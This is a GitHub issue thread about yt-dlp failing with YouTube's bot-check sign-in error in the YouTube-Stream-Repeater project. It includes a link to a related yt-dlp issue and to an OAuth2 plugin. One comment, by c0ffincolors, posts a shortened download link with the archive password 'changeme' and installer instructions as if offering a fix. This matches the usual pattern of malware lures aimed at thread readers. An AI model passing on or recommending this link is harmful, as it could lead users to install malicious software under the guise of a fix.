### ISSUE TITLE
Sign in to confirm you’re not a bot.

### ISSUE THREAD

**Issue by hoangmnsd** [DavidBerdik/YouTube-Stream-Repeater#7]
Hi, 

It seems recently Youtube change some behavior to the API
`yt-dlp -j ` will not work on some machine. 

```
$ yt-dlp -j ID
ERROR: [youtube] ID: Sign in to confirm you’re not a bot. This helps protect our community. Learn more
```

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by DavidBerdik** [comment]
Hello!

Unfortunately, I don't really have the time to investigate this very much at the moment, but I did find [this GitHub issue](https://github.com/yt-dlp/yt-dlp/issues/10128) on the yt-dlp repo discussing it. YouTube Stream Repeater uses yt-dlp for managing its interactions with YouTube.

Are you trying to use YouTube Stream Repeater on a server that routes its traffic through a proxy or VPN or is the server running on a network shared by many users such as a college campus?

**Comment by hoangmnsd** [comment]
For anyone want to fix this issue, use this repo:
https://github.com/coletdjnz/yt-dlp-youtube-oauth2

**Comment by DavidBerdik** [comment]
@hoangmnsd Thank you for sharing this!
